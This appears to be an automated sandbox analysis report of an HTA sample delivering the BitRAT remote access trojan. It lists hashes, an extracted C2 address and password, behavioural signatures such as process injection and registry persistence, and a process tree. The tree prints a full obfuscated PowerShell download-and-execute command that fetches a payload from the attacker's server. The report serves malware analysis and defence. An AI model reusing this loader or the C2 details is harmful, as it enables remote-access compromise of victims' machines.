135.148.74.241_HCrypt.zip

General

Target: 135.148.74.241_HCrypt/PS1.hta
Filesize: 3KB
Completed: 20-01-2022 14:34
Score: 10/10
MD5: 37f9dc388fedc16b308acaadc34c2054
SHA1: 25c936c0b399b82ad39363f6237fd5db13369bda
SHA256: f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3

Malware Config

Extracted (language: ps1, deobfuscated)

URLs
  exe.dropper: http://135.148.74.241/PS1_B.txt

Extracted

Family: bitrat
Version: 1.38
C2: 135.148.74.241:8080

Attributes
  communication_password: f1c1592588411002af340cbaedd6fc33
  tor_process: tor
Signatures 14

  • BitRAT

    Description

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)

    Description

    Suricata alert from the Emerging Threats (ET MALWARE) ruleset: the TLS certificate presented by the C2 endpoint matches one known to be used by BitRAT command-and-control servers.
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid  | process
    23   | 3744 | powershell.exe
    45   | 3744 | powershell.exe
  • Sets service image path in registry

    TTPs

    Registry Run Keys / Startup Folder; Modify Registry
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmp | upx
    behavioral2/memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmp | upx
    behavioral2/memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmp | upx
  • Checks computer location settings
    mshta.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query Registry; System Information Discovery

    Reported IOCs

    description       | ioc                                                                                                   | process
    Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | mshta.exe
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    aspnet_compiler.exe

    Reported IOCs

    pid  | process
    1408 | aspnet_compiler.exe (5 identical entries)
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    description                           | pid  | process        | target process
    PID 3744 set thread context of 1408   | 3744 | powershell.exe | aspnet_compiler.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies data under HKEY_USERS
    WaaSMedicAgent.exe

    Reported IOCs (description | ioc | process)

    41 "Key created" entries by WaaSMedicAgent.exe under \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ and \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\ (CA, Root, Disallowed, TrustedPeople, SmartCardRoot, trust and their Certificates/CRLs/CTLs subkeys). WaaSMedicAgent.exe is a Windows Update Medic Service component; certificate-store key creation under the .DEFAULT hive is routine system activity and is not attributable to the sample.
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pid  | process
    3744 | powershell.exe (2 identical entries)
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, aspnet_compiler.exe

    Reported IOCs

    description                 | pid  | process
    Token: SeDebugPrivilege     | 3744 | powershell.exe
    Token: SeShutdownPrivilege  | 1408 | aspnet_compiler.exe
  • Suspicious use of SetWindowsHookEx
    aspnet_compiler.exe

    Reported IOCs

    pid  | process
    1408 | aspnet_compiler.exe (2 identical entries)
  • Suspicious use of WriteProcessMemory
    mshta.exe, powershell.exe

    Reported IOCs

    description                       | pid  | process        | target process
    PID 3432 wrote to memory of 3744  | 3432 | mshta.exe      | powershell.exe (3 identical entries)
    PID 3744 wrote to memory of 1408  | 3744 | powershell.exe | aspnet_compiler.exe (7 identical entries)
Processes 5
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    Checks computer location settings
    Suspicious use of WriteProcessMemory
    PID:3432
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
      Blocklisted process makes network request
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3744
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        PID:1408
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe aed221520e0f14fb3027394fae42bfb3 C25sboTFCk+5gsrP8JQ7OQ.0.1.0.0.0
    Modifies data under HKEY_USERS
    PID:3944
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
    PID:2684